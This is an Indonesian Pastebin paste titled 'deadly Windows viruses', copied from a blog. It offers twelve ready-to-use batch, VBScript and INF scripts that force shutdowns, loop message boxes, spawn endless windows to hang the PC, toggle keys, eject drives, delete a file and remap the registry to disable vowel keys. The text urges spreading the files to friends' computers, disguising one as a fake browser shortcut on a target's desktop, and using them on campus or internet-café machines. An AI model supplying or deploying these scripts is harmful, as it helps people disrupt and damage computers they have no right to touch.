Advertisement
anaswae

VIRUS WINDOWS MEMATIKAN

May 11th, 2020
91
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.61 KB | None | 0 0
  1.  
  2. http://aeroaxel.blogspot.com/2013/03/cara-membuat-virus-dengan-notepad.html#
  3.  
  4. TRIK 1 - Membuat Forced Shoutdown
  5. -------------------------------------------------
  6. @echo off
  7. msg * I don't like you
  8. shutdown -c "Error! You are too ******!" -s
  9. -------------------------------------------------
  10. simpan kode script yang berwarna Merah di Notepad dengan nama : xhack.BAT type file : All file
  11. sebarkan File tersebut di Komputer teman Anda,
  12. maka Komputer korban akan otomatis FORCED SHOUTDOWN
  13.  
  14.  
  15. TRIK 2 - Membuat Tombol Caps Lock menyala terus-menerus
  16. ------------------------------------------------------------------
  17. Set wshShell =wscript.CreateObject("WScript.Shell")
  18. do
  19. wscript.sleep 100
  20. wshshell.sendkeys "{CAPSLOCK}"
  21. loop
  22. -------------------------------------------------------
  23. seperti cara yang pertama, hanya berbeda kode script simpan kode yangberwarna biru di Notepad dengan nama : xhack.VBS type File : All File
  24. sebarkan File berikut di Komputer korban maka, Tombol CAPSLOCK akan menyala terus-menerus
  25. (bila dimatikan akan menyala lagi)
  26.  
  27.  
  28. TRIK 3 - Membuat Pesan Jail mucul terus
  29. ------------------------------------------------------
  30. @ECHO off
  31. :Begin
  32. msg * muka kamu sangat jelek
  33. msg * ngaca dulu gih,
  34. msg * hayo lo,cpu lu gw acak acak
  35. msg * udah install ulang aja
  36. msg * biar masalah nya kelar
  37. GOTO BEGIN
  38.  
  39. ------------------------------------------------------
  40.  
  41. simpan kode script yang berwarna hijau dengan nama xhack.BAT type file :All File
  42. Cara ini sangat simple Jail, walaupun di close tab pesan ini masih muncul, kata katanya bisa diubah sesuai selera.
  43.  
  44.  
  45.  
  46.  
  47. TRIK 4 - Jail dengan Membuka Tutup CD/DVD room
  48. ------------------------------------------------------
  49. Set oWMP = CreateObject("WMPlayer.OCX.7")
  50. Set colCDROMs = oWMP.cdromCollection
  51. do
  52. if colCDROMs.Count >= 1 then
  53. For i = 0 to colCDROMs.Count - 1
  54. colCDROMs.Item(i).Eject
  55. Next
  56. For i = 0 to colCDROMs.Count - 1
  57. colCDROMs.Item(i).Eject
  58. Next
  59. End If
  60. wscript.sleep 5000
  61. loop
  62. -------------------------------------------------------
  63. simpan di Notepad kode berikut dengan nama : xhack.vbs type file : All File
  64. maka DVD/CD roomnya akan membuka dan menutup otomatis,
  65.  
  66.  
  67. TRIK 5 - Membuat script mucul terus menerus
  68. -------------------------------------------------------
  69. Set wshShell = wscript.CreateObject("WScript.Shell")
  70. do
  71. wscript.sleep 100
  72. wshshell.sendkeys "~(enter)"
  73. loop
  74. -------------------------------------------------------
  75. simpan kode berikut di Notepad dengan nama : xhack.vbs type file : All File
  76. membuat script bermunculan terus menerus
  77.  
  78.  
  79. TRIK 6 - Membuat Tombol Backspace menjadi eror - menekan terus menerus
  80. --------------------------------------------------------
  81. MsgBox "kembali ke menu sebelumnya"
  82. Set wshShell =wscript.CreateObject("WScript.Shell")
  83. do
  84. wscript.sleep 100
  85. wshshell.sendkeys "{bs}"
  86. loop
  87. ----------------------------------------------------------
  88. simpan kode script berikut di Notepad dengan nama : xhack.vbs type file :All File
  89. maka Tombol Backspace akan eror dan menekan dengan sendirinya
  90.  
  91.  
  92. TRIK 7 - Cara Membuat Pesan ' Komputer Anda Jelek Banget ' di Notepad/ Wordpad
  93. -----------------------------------------------------------
  94. Set wshShell = wscript.CreateObject("WScript.Shell")
  95. do
  96. wscript.sleep 100
  97. wshshell.sendkeys "Komputer Anda Jelek Banget"
  98. loop
  99. -----------------------------------------------------------
  100. ganti kata Komputer Anda Jelek Banget dengan selera Anda, simpan diNotepad dengan nama : xhack.vbs
  101.  
  102.  
  103. TRIK 8 - Cara Membuat Notepad Terbuka Otomatis - terus menerus
  104. ------------------------------------------------------------
  105. @ECHO off
  106. :top
  107. START %SystemRoot%\system32\notepad.exe
  108. GOTO top
  109. ------------------------------------------------------------
  110. simpan di Notepad dengan nama : xhack.BAT
  111. maka Notepad akan terbuka terus menerus
  112.  
  113.  
  114.  
  115.  
  116. TRIK 9 - Membuat Notepad dengan Pesan Jail
  117. -------------------------------------------------------------
  118.  
  119. WScript.Sleep 1800
  120. WScript.Sleep 100
  121. Set WshShell = WScript.CreateObject("WScript.Shell")
  122. WshShell.Run "notepad"
  123. WScript.Sleep 10
  124. WshShell.AppActivate "Notepad"
  125. WScript.Sleep 50
  126. WshShell.SendKeys "ka"
  127. WScript.Sleep 50
  128. WshShell.SendKeys "mu "
  129. WScript.Sleep 50
  130. WshShell.SendKeys "je"
  131. WScript.Sleep 50
  132. WshShell.SendKeys "le"
  133. WScript.Sleep 50
  134. WshShell.SendKeys "k "
  135. WScript.Sleep 50
  136. WshShell.SendKeys " se"
  137. WScript.Sleep 50
  138. WshShell.SendKeys "ka"
  139. WScript.Sleep 50
  140. WshShell.SendKeys "li"
  141. WScript.Sleep 50
  142. WshShell.SendKeys " y"
  143. WScript.Sleep 50
  144. WshShell.SendKeys "a"
  145. WScript.Sleep 50
  146. WshShell.SendKeys " h"
  147. WScript.Sleep 50
  148. WshShell.SendKeys "!"
  149. WScript.Sleep 50
  150. WshShell.SendKeys "!! "
  151. -----------------------------------------------------------
  152. simpan di Notepad dengan nama : xhack.vbs
  153. ganti kode yang berwarna merah sesuai dengan selera anda.
  154.  
  155.  
  156. TRIK 10 - Cara Membuat Memilih jawaban seperti Quiz di Notepad
  157. -----------------------------------------------------------
  158. @echo off
  159. title quiz hari ini :)
  160. :menu
  161. cls
  162. echo jika kamu kena virus apa
  163. yang kamu lakukan
  164. pause
  165. echo pilih yang mana:
  166. echo 1. matiin computer
  167. echo 2. format aja
  168. echo 3. bingung ahh
  169. set input=nothing
  170. set /p input=Choice:
  171. if %input%==1 shutdown -s -t
  172. 30
  173. if %input%==2 del c:xxx
  174. if %input%==3 @ECHO off
  175. msg * muka lo rusak
  176. msg * ngaca dulu gih
  177. msg * hayo lo,cpu lu gw acak2
  178. msg * ud install ulang aja
  179. msg * biar masalah nya kelar
  180. @ECHO off
  181. :top
  182. START %SystemRoot%
  183. system32notepad.exe
  184. GOTO top
  185. -----------------------------------------------------------
  186. simpan kode script berikut di Notepad dengan nama : xhack.BAT
  187.  
  188.  
  189.  
  190. TRIK 11 - Membuat Komputer Hang dengan Kode script Notepad
  191. -------------------------------------------------------------
  192.  
  193. start
  194.  
  195. start
  196.  
  197. start
  198.  
  199. start
  200.  
  201. start
  202.  
  203. start
  204.  
  205. start
  206.  
  207. start
  208.  
  209. start
  210.  
  211. start
  212.  
  213. start
  214.  
  215. start
  216.  
  217. -----------------------------------------------------------
  218. simpan di Notepad dengan nama : xhack.BAT
  219. terus buat shortcut palsu terserah mau shortcut apa, aku saranin shortcutnya browser mozilla terus taro aja di desktop target
  220. ( efeknya akan membuka CDM yang banyak banget sampe layarnya keluar keluar )
  221.  
  222.  
  223.  
  224. TRIK 12 - Cara Mematikan Tombol Keyboard
  225. -------------------------------------------------------------
  226. 1. Salin baris-baris kode (script) berikut , paste pada Notepad dan simpan dengan nama JAIL.INF
  227.  
  228. Langsung kita mulai saja :
  229.  
  230. [Version]
  231. Signature=”$Windows NT$”
  232.  
  233. [DefaultInstall]
  234. AddReg =AIUEO
  235.  
  236. [AIUEO]
  237. HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”,0×1,00,00,00,00,00,00,00,00,06,00,00,00,00,00,1e,00,00,00,12,00,00,00,
  238. 17,00,00,00,18,00,00,00,16,00,00,00,00,00
  239.  
  240. —————————————
  241.  
  242. 2. Untuk menjalankannya, klik kanan nama file JAIL.INF dan pilih menu> Install
  243.  
  244. 3. Log Off komputernya agar trik ini berfungsi.
  245.  
  246. NB :
  247.  
  248. Script diatas dimaksudkan untuk mematikan tombol A I U E O pada keyboard.
  249.  
  250. Untuk menormalkannya, silahkan salin script berikut :
  251.  
  252. —————————————
  253.  
  254. [Version]
  255. Signature=”$Windows NT$”
  256.  
  257. [DefaultInstall]
  258. DelReg =normal
  259.  
  260. [normal]
  261. HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”
  262.  
  263. —————————————
  264.  
  265. —> Simpan dengan nama “NORMAL.INF”
  266. Klik kanan file ini, pilih >Install
  267. Log Off komputernya.
  268.  
  269. sumber artikel hack : kidzoom
  270. Harusnya pasti sedikit kaget dan coba low bayangin kalau trik ini kamu
  271.  
  272. praktekan di kompi temen kamu atau mungkin kompi kampus atau warnet..
  273.  
  274. what will happen ? abis pastinya ..
  275.  
  276.  
  277. Read more: Aero Axel: Cara Membuat Virus Dengan Notepad (cracking with notepad) http://aeroaxel.blogspot.com/2013/03/cara-membuat-virus-dengan-notepad.html#ixzz6M909u26i
  278. Follow us: @gung_richie on Twitter
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement